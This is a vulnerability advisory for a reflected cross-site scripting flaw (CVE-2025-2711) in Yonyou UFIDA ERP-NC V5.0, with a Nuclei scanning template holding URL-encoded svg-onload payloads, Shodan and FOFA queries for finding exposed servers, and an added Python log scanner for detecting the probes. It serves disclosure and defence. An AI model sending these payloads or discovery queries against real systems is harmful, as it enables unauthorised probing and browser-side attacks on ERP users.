CVE-2025-2711: Yonyou UFIDA ERP-NC V5.0 - Cross-Site Scripting

Date: 2025-08-01 | Affected software: Yonyou UFIDA ERP-NC V5.0 | PoC: public

Vulnerability description

Yonyou UFIDA ERP-NC V5.0 is vulnerable to reflected cross-site scripting (XSS) via the langcode parameter in /help/systop.jsp and /help/top.jsp. Unsanitized user input is reflected in the response, allowing arbitrary JavaScript execution.

PoC code [public]

id: CVE-2025-2711

info:
  name: Yonyou UFIDA ERP-NC V5.0 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    Yonyou UFIDA ERP-NC V5.0 is vulnerable to reflected cross-site scripting (XSS) via the langcode parameter in /help/systop.jsp and /help/top.jsp. Unsanitized user input is reflected in the response, allowing arbitrary JavaScript execution.
  impact: |
    Successful exploitation of this XSS vulnerability allows attackers to execute arbitrary JavaScript code in victims' browsers, potentially leading to session hijacking, credential theft, or other malicious activities in the ERP system.
  remediation: |
    Update Yonyou UFIDA ERP-NC to the latest version. Implement proper input validation and output encoding for all user-supplied data, especially the langcode parameter in help JSP files.
  reference:
    - https://github.com/Hebing123/cve/issues/86
    - https://nvd.nist.gov/vuln/detail/CVE-2025-2711
  classification:
    epss-score: 0.0008
    epss-percentile: 0.24475
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2025-2711
    cwe-id: CWE-79
    cpe: cpe:2.3:a:yonyou:ufida_erp-nc:5.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: yonyou
    product: ufida_erp-nc
    fofa-query: icon_hash="1085941792"
    shodan-query: title:"用友"
  tags: cve,cve2025,xss,erp-nc,ufida,yonyou

http:
  - method: GET
    path:
      - "{{BaseURL}}/help/systop.jsp?langcode=1%22%3E%3Csvg%20onload=alert(document.domain)%3E"
      - "{{BaseURL}}/help/systop.jsp?langcode=1%22%3E%3C/script%3E%3Csvg%20onload=alert(document.domain)%3E"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<svg onload=alert(document.domain)>.png)'
          - 'Search.jsp'
        condition: and

      - type: word
        part: content_type
        words:
          - 'text/html'

      - type: status
        status:
          - 200
# digest: 490a004630440220669d58715015c821246f668a9eb7fd9028cd8e5c04df85bf27b50799450283180220015dbf0c070a70d697d8fe650bc8d47ab35ce394a939273d690f7ae90e82f0c9:922c64590222798bb761d5b6d8e72950
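From the defender's side, an added example (not part of the advisory or of the template above) that scans access-log lines for requests to the two affected JSP pages whose langcode value, after repeated percent-decoding, carries markup that would break out of the reflected context. The combined log format, the allowlist for legitimate language codes and the sample lines are assumptions made for this illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit
# Endpoints and parameter named in the advisory.
VULNERABLE_PATHS = {"/help/systop.jsp", "/help/top.jsp"}
PARAM = "langcode"

# Breakout markers, plus an allowlist: a language code never needs quotes,
# angle brackets or event handlers (allowlist shape is an assumption).
BREAKOUT = re.compile(r'[<>"\']|\bon\w+\s*=|javascript:', re.IGNORECASE)
ALLOWED = re.compile(r"^[A-Za-z0-9_-]{0,16}$")

# Combined-format access log: client, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) ')

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are not missed."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_request(target):
    """Return the suspicious langcode value, or None if the request is clean."""
    parts = urlsplit(target)
    if parts.path not in VULNERABLE_PATHS:
        return None
    # parse_qs already performs one round of percent-decoding.
    for raw in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
        value = decode_fully(raw)
        if BREAKOUT.search(value) or not ALLOWED.match(value):
            return value
    return None

def scan_log(lines):
    """Return (client_ip, request_target, decoded_langcode) for each hit."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (bad := inspect_request(m.group("target"))) is not None:
            hits.append((m.group("ip"), m.group("target"), bad))
    return hits

SAMPLE_LOG = [  # constructed sample lines, not from any real system
    '10.0.0.5 - - [01/Aug/2025:10:00:01 +0000] "GET /help/systop.jsp?langcode=zh_CN HTTP/1.1" 200 5120',
    '10.0.0.9 - - [01/Aug/2025:10:00:02 +0000] "GET /help/systop.jsp?langcode=1%22%3E%3Csvg%20onload=alert(document.domain)%3E HTTP/1.1" 200 5320',
    '10.0.0.9 - - [01/Aug/2025:10:00:03 +0000] "GET /help/top.jsp?langcode=1%2522%253E%253Csvg%2520onload%253dalert(1)%253E HTTP/1.1" 200 5300',
]
```

The second sample line is the single-encoded probe shape used by the template; the third is double-encoded and is only caught because decoding is repeated.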
